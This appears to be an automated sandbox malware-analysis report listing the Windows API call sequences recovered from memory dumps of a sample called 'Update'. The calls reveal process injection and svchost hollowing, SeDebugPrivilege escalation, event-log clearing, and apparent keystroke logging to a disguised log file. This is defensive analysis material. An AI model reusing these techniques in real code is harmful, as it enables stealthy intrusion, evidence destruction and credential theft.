                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 034E7983
                                                                                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 034E798B
                                                                                            • GetProcessId.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 034E7992
                                                                                            • _memset.LIBCMT ref: 034E79B4
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,000000FA,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 034E79CA
                                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,00000118,00003000,00000040), ref: 034E79FF
                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000118,00000000), ref: 034E7A1B
                                                                                            • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000001,?), ref: 034E7A43
                                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,00001000,00003000,00000040), ref: 034E7A58
                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,034E76F0,00001000,00000000), ref: 034E7A72
                                                                                            • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000001,00000000), ref: 034E7A90
                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 034E7AA1
                                                                                            • Sleep.KERNEL32(0000EA60,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 034E7ABA
                                                                                            • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000040,00000000), ref: 034E7AD6
                                                                                            • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000040,00000000), ref: 034E7AE8
                                                                                            • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 034E7AF1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$Virtual$AddressLibraryLoadProcProtect_memset$AllocCreateCurrentFileMemoryOpenThreadWrite$AttributesDirectoryModuleNameRemoteResumeSleepSystemToken_vswprintf_s
                                                                                            • String ID: %s%s$D$ExitProcess$Kernel32.dll$OpenProcess$WaitForSingleObject$WinExec$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                            • API String ID: 4176418925-3213446972
                                                                                            • Opcode ID: f9f8123eba8ff2a07b2987f9ec5ea86ca6dedfd763c073cf8698b816abec043f
                                                                                            • Instruction ID: d515381ee47cdb73a3b600f19b6b18b9b7e6092382ae93a858edcb24ed9da4e3
                                                                                            • Opcode Fuzzy Hash: f9f8123eba8ff2a07b2987f9ec5ea86ca6dedfd763c073cf8698b816abec043f
                                                                                            • Instruction Fuzzy Hash: D781C871A403187FDB21EB61DC49FDF777CEF55B05F000499F208AA191EAB19A85CE68
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 034E7E73
                                                                                            • _memset.LIBCMT ref: 034E7E9F
                                                                                            • _memset.LIBCMT ref: 034E7ED4
                                                                                            • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 034E7EE8
                                                                                              • Part of subcall function 034E8720: _vswprintf_s.LIBCMT ref: 034E8731
                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 034E7F15
                                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 034E7F65
                                                                                            • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 034E7F92
                                                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00003000,00000040), ref: 034E7FAA
                                                                                            • GetThreadContext.KERNEL32(?,?,?,00000000,?,00003000,00000040), ref: 034E7FCC
                                                                                            • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,00003000,00000040), ref: 034E7FEA
                                                                                            • ResumeThread.KERNEL32(?,?,00000000,?,00003000,00000040), ref: 034E7FFF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                            • String ID: %s%s$D$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                            • API String ID: 2170139861-2473635271
                                                                                            • Opcode ID: ec48b86ca49b7f0148899c97c836c2d9d124f84293568d0954abf80ad5faed8b
                                                                                            • Instruction ID: a049e3abaefa125a30c6da149582dc18d2447892317ed13bdd34211b33ffcc3c
                                                                                            • Opcode Fuzzy Hash: ec48b86ca49b7f0148899c97c836c2d9d124f84293568d0954abf80ad5faed8b
                                                                                            • Instruction Fuzzy Hash: 434194B1A003586FDB20DB61DC95FDE77BCAB44705F0045D9E609AA2C0EAB15B85CF54
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,03510D80,74DEE010,74DF2FA0,74DF0F00,?,034E6028,?,?), ref: 034EE519
                                                                                            • lstrcatW.KERNEL32(03510D80,\DisplaySessionContainers.log,?,034E6028,?,?), ref: 034EE529
                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,03510D80,?,034E6028,?,?), ref: 034EE538
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,034E6028,?,?), ref: 034EE546
                                                                                            • CreateFileW.KERNEL32(03510D80,40000000,00000002,00000000,00000004,00000080,00000000,?,034E6028,?,?), ref: 034EE563
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,034E6028,?,?), ref: 034EE56E
                                                                                            • CloseHandle.KERNEL32(00000000,?,034E6028,?,?), ref: 034EE577
                                                                                            • DeleteFileW.KERNEL32(03510D80,?,034E6028,?,?), ref: 034EE58A
                                                                                            • ReleaseMutex.KERNEL32(00000000,?,034E6028,?,?), ref: 034EE597
                                                                                            • DirectInput8Create.DINPUT8(?,00000800,03504934,03511220,00000000,?,034E6028,?,?), ref: 034EE5B2
                                                                                            • GetTickCount.KERNEL32 ref: 034EE665
                                                                                            • GetKeyState.USER32(00000014), ref: 034EE672
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFile$Mutex$CloseCountDeleteDirectFolderHandleInput8ObjectPathReleaseSingleSizeStateTickWaitlstrcat
                                                                                            • String ID: <$\DisplaySessionContainers.log
                                                                                            • API String ID: 1095970075-1170057892
                                                                                            • Opcode ID: 84beee8042f451e7c7240a26034afdedaa25c6c1ec121e9b36da511adea2565f
                                                                                            • Instruction ID: 691cb5ac3704cb0217483a25eb7f3d3a180c423fa9ae6bd2bf9185ee66f6ebfe
                                                                                            • Opcode Fuzzy Hash: 84beee8042f451e7c7240a26034afdedaa25c6c1ec121e9b36da511adea2565f
                                                                                            • Instruction Fuzzy Hash: CF419B70740305AFD700EFA5EC49F9E7BA8AB48709F104449F725DF2A4C672E58A9F98
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,?,034EDFA4), ref: 034E7637
                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,034EDFA4), ref: 034E763E
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 034E765A
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 034E7677
                                                                                            • CloseHandle.KERNEL32(?), ref: 034E7681
                                                                                            • GetModuleHandleA.KERNEL32(NtDll.dll,NtSetInformationProcess,?,?,?,?,?,?,?,034EDFA4), ref: 034E7691
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 034E7698
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 034E76BA
                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 034E76C7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentHandleOpenToken$AddressAdjustCloseLookupModulePrivilegePrivilegesProcValue
                                                                                            • String ID: NtDll.dll$NtSetInformationProcess$SeDebugPrivilege
                                                                                            • API String ID: 1802016953-1577477132
                                                                                            • Opcode ID: 9668d9d1a5e2d9c6398b5b3278e360379fc295554c9efab52c83a09eeed5c11f
                                                                                            • Instruction ID: 6fabefaf2f99dbce15090587d76a83b0ba7d41a8d266f6deb9c979f8164d38e5
                                                                                            • Opcode Fuzzy Hash: 9668d9d1a5e2d9c6398b5b3278e360379fc295554c9efab52c83a09eeed5c11f
                                                                                            • Instruction Fuzzy Hash: 1621A571A40308AFE710EBE4DC1EFBE7778EB08715F004809FA05AA1D0DAB25549DBA5
                                                                                            APIs
                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 034F0576
                                                                                            • GetSystemInfo.KERNEL32(?), ref: 034F058E
                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 034F059E
                                                                                            • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 034F05AE
                                                                                            • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 034F0600
                                                                                            • VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 034F0615
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Virtual$AddressAllocHandleInfoModuleProcProtectQuerySystem
                                                                                            • String ID: SetThreadStackGuarantee$kernel32.dll
                                                                                            • API String ID: 3290314748-423161677
                                                                                            • Opcode ID: 92ae7c8a528f9025e86607ef4e6edda005f3ad03ddb78dc5c89e961d46c609af
                                                                                            • Instruction ID: 8676836dfa6e00c7129b524c6a24b56b3f3c03711242f103b3bb38d70d01d1af
                                                                                            • Opcode Fuzzy Hash: 92ae7c8a528f9025e86607ef4e6edda005f3ad03ddb78dc5c89e961d46c609af
                                                                                            • Instruction Fuzzy Hash: CC31C371E0021AAFDB10DBA0DC84AFFB7B9EB84745F180516E611EB155DB70AA05CB94
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 034E7B89
                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 034E7B90
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 034E7BB6
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 034E7BCC
                                                                                            • GetLastError.KERNEL32 ref: 034E7BD2
                                                                                            • CloseHandle.KERNEL32(?), ref: 034E7BE0
                                                                                            • CloseHandle.KERNEL32(?), ref: 034E7BFB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                            • String ID: SeShutdownPrivilege
                                                                                            • API String ID: 3435690185-3733053543
                                                                                            • Opcode ID: 1016c142a0a9ccfed60532011b29cb54b1d98f3885027eea339a1ef1ec006127
                                                                                            • Instruction ID: 29b1d0ae768e4f6319617bbe0918629a2b1a721afaa580be79b6517b79dd01a5
                                                                                            • Opcode Fuzzy Hash: 1016c142a0a9ccfed60532011b29cb54b1d98f3885027eea339a1ef1ec006127
                                                                                            • Instruction Fuzzy Hash: 2711C471A40309AFDB10EFA0DC1DFAE7B78EB08709F404959F905AB184CA729909DBA0
                                                                                            APIs
                                                                                              • Part of subcall function 6C39A893: GetLastError.KERNEL32(?,?,6C395151,?,6C371A6D,00000000), ref: 6C39A897
                                                                                              • Part of subcall function 6C39A893: SetLastError.KERNEL32(00000000,6C371A6D,00000000), ref: 6C39A939
                                                                                            • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 6C3A6276
                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 6C3A62B4
                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 6C3A62C7
                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6C3A630F
                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6C3A632A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                            • String ID: PX;lE
                                                                                            • API String ID: 415426439-390628446
                                                                                            • Opcode ID: cfa93b955f925c99f382994d670c95aa5689b2aa0b284bf30681fd3ed76cb994
                                                                                            • Instruction ID: ba2b0f9acd3798432ccfdea2b433c8c004b4fe8144b2e4e1a272c5686a47860a
                                                                                            • Opcode Fuzzy Hash: cfa93b955f925c99f382994d670c95aa5689b2aa0b284bf30681fd3ed76cb994
                                                                                            • Instruction Fuzzy Hash: A6515F71A01209ABEF00DFE8CC44AEE77B8EF15709F104529E960E7590E771DA66CF61
                                                                                            APIs
                                                                                            • CryptStringToBinaryA.CRYPT32(n7l,00000000,00000001,00000000,00000000,00000000,00000000), ref: 6C376570
                                                                                            • CryptStringToBinaryA.CRYPT32(n7l,00000000,00000001,00000000,00000000,00000000,00000000), ref: 6C37660E
                                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 6C37666D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: BinaryCryptString$___std_exception_copy
                                                                                            • String ID: Failed to calculate base64 decoded size.$P~7l$n7l
                                                                                            • API String ID: 2515837927-3823540466
                                                                                            • Opcode ID: 0c237b8e977e10cba9e66d7dbde2be2ec555aa4b827b1bb4cb1c0570398fb51b
                                                                                            • Instruction ID: dbcccb4f9cb8886f0476a8e81b417ba6b5987521e7176c1b74c2eb17cc18a13e
                                                                                            • Opcode Fuzzy Hash: 0c237b8e977e10cba9e66d7dbde2be2ec555aa4b827b1bb4cb1c0570398fb51b
                                                                                            • Instruction Fuzzy Hash: 8F417CB1901309ABEB20CF94CC45BDEBBB8EB04714F144529E945ABB80D779A548CFA6
                                                                                            APIs
                                                                                            • OpenEventLogW.ADVAPI32(00000000,035058BC), ref: 034EB3E7
                                                                                            • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 034EB3F2
                                                                                            • CloseEventLog.ADVAPI32(00000000), ref: 034EB3F9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Event$ClearCloseOpen
                                                                                            • String ID: Application$Security$System
                                                                                            • API String ID: 1391105993-2169399579
                                                                                            • Opcode ID: 834c58abd297628a15f768a96e47b74b36b986f3c618e87ab5344f6df86d10bf
                                                                                            • Instruction ID: 10f717362c9b6cd57b92fa20c152e9aeb185d564f1b7916f2f44555b0053a07f
                                                                                            • Opcode Fuzzy Hash: 834c58abd297628a15f768a96e47b74b36b986f3c618e87ab5344f6df86d10bf
                                                                                            • Instruction Fuzzy Hash: 13E0E5327093144BD211DF06A889B1EF3D0FFC930AF14091EE94856264C631880A9F9A
                                                                                            APIs
                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 000215DC
                                                                                            • memset.VCRUNTIME140(?,00000000,00000003), ref: 00021602
                                                                                            • memset.VCRUNTIME140(?,00000000,00000050), ref: 0002168C
                                                                                            • IsDebuggerPresent.KERNEL32 ref: 000216A8
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000216C8
                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 000216D2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3562466950.0000000000021000.00000020.00000001.01000000.00000005.sdmp, Offset: 00020000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3562433732.0000000000020000.00000002.00000001.01000000.00000005.sdmp
                                                                                             • Associated: 00000003.00000002.3562507849.0000000000022000.00000002.00000001.01000000.00000005.sdmp
                                                                                             • Associated: 00000003.00000002.3562539425.0000000000023000.00000004.00000001.01000000.00000005.sdmp
                                                                                             • Associated: 00000003.00000002.3562581470.0000000000024000.00000002.00000001.01000000.00000005.sdmp
                                                                                             • Associated: 00000003.00000002.3562581470.0000000000066000.00000002.00000001.01000000.00000005.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_20000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                            • String ID:
                                                                                            • API String ID: 1045392073-0
                                                                                            • Opcode ID: 24da01e82335f6cb0f53cbb2cd5ee48e3e6859f725f2684b693de5798fa9c413
                                                                                            • Instruction ID: 9ba151cbeeb163b64d2e0a72e581da700ff0c4ea53d8f9c087bc990fdc0a7949
                                                                                            • Opcode Fuzzy Hash: 24da01e82335f6cb0f53cbb2cd5ee48e3e6859f725f2684b693de5798fa9c413
                                                                                            • Instruction Fuzzy Hash: 15311875D0522CDBDB21DFA4D989BCCBBF8AF18304F1041EAE409AB251EB759A85CF44
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: swprintf$_memset
                                                                                            • String ID: :$@
                                                                                            • API String ID: 1292703666-1367939426
                                                                                            • Opcode ID: 3ce09b44c703f379a6cffab786f078c12705430181853880a2577985a84515e9
                                                                                            • Instruction ID: 30b8622f30d614624d8792eb35ff1f375b5b520d9b9cd8c53b60c65094a1e0db
                                                                                            • Opcode Fuzzy Hash: 3ce09b44c703f379a6cffab786f078c12705430181853880a2577985a84515e9
                                                                                            • Instruction Fuzzy Hash: E53161B6D0121CABDB14DFE5CC85FEEB7B9FB88300F50421DE90AAB241E6746A45CB54
                                                                                            APIs
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,2000000B,6C3A62A4,00000002,00000000,?,?,?,6C3A62A4,?,00000000), ref: 6C3A696C
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,20001004,6C3A62A4,00000002,00000000,?,?,?,6C3A62A4,?,00000000), ref: 6C3A6995
                                                                                            • GetACP.KERNEL32(?,?,6C3A62A4,?,00000000), ref: 6C3A69AA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID: ACP$OCP
                                                                                            • API String ID: 2299586839-711371036
                                                                                            • Opcode ID: 8ddfd99c1edd516f5cd2d22025282832291ef0a0f13e63fa44823072b9c7e278
                                                                                            • Instruction ID: dd94c8aee8c4bd7fb35d6a80bc4ef55b15b68e2a39950b1983f617f7029f8483
                                                                                            • Opcode Fuzzy Hash: 8ddfd99c1edd516f5cd2d22025282832291ef0a0f13e63fa44823072b9c7e278
                                                                                            • Instruction Fuzzy Hash: 0421B372704101A6D7148FADC901A87B3BAEF41F5CB56852CE919D7904E733DE62CFA8
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,034E78FC), ref: 034E7756
                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,034E78FC,?,?,?,?,?,?,74DF0630), ref: 034E775D
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 034E7785
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 034E77B9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                            • String ID: SeDebugPrivilege
                                                                                            • API String ID: 2349140579-2896544425
                                                                                            • Opcode ID: 39385549c5b268e9d4d76833de73e6b95165c4b1e50c21520b28fedc233d85af
                                                                                            • Instruction ID: 25625ab02e219796009583ce745ab15e54b38524fbb302fec2e926f388f11c10
                                                                                            • Opcode Fuzzy Hash: 39385549c5b268e9d4d76833de73e6b95165c4b1e50c21520b28fedc233d85af
                                                                                            • Instruction Fuzzy Hash: 6711A570A40308ABDF00DFE5D959FAEB7B4EB08705F108559E905AB2D0DA75A509CB50
                                                                                            APIs
                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00917914
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00917929
                                                                                            • UnhandledExceptionFilter.KERNEL32(10015350), ref: 00917934
                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00917950
                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00917957
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                            • String ID:
                                                                                            • API String ID: 2579439406-0
                                                                                            • Opcode ID: 57dfde80044b951cb17f91093e50248a3407fe2147c9df5aa397585be7e6a5f4
                                                                                            • Instruction ID: 1a4cb92dfd04904e9877209a5a348e654a95fc8bcf89b9d7d7906708dca4ca89
                                                                                            • Opcode Fuzzy Hash: 57dfde80044b951cb17f91093e50248a3407fe2147c9df5aa397585be7e6a5f4
                                                                                            • Instruction Fuzzy Hash: AA21DFB4914228EFF702DF69C9C96997BF5BB0A315F40D01AE5098B261EBB5D9C0CF81
                                                                                            APIs
                                                                                            • IsDebuggerPresent.KERNEL32 ref: 034F131C
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 034F1331
                                                                                            • UnhandledExceptionFilter.KERNEL32(035025B8), ref: 034F133C
                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 034F1358
                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 034F135F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                            • String ID:
                                                                                            • API String ID: 2579439406-0
                                                                                            • Opcode ID: 1765539d54697d7d7ecdcae64382369e193a25cc2b0dd88bd6a9ca7602b1920d
                                                                                            • Instruction ID: 30f1b34cc9c0f3de4b620bb0962dcc1187c4f359408c5ae46ee74ebee0984166
                                                                                            • Opcode Fuzzy Hash: 1765539d54697d7d7ecdcae64382369e193a25cc2b0dd88bd6a9ca7602b1920d
                                                                                            • Instruction Fuzzy Hash: 472107B8449305DFC760FF68F14AE483BA4BB0830CF10041AE908873B9DB72958AEF55
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 73040311bb29c5914551622f8c1703dce3cbee9cddaee4a5e747c8be854a9458
                                                                                            • Instruction ID: 52f360d0e18fcd35b308732043e3dff20b1c5423475d7219511c24100cfed7cb
                                                                                            • Opcode Fuzzy Hash: 73040311bb29c5914551622f8c1703dce3cbee9cddaee4a5e747c8be854a9458
                                                                                            • Instruction Fuzzy Hash: 6B025C71E012199FDB14CFA9D88069EFBB1FF48319F24826AD519E7740E731AA41CF90
APIs
• FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C39F978
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
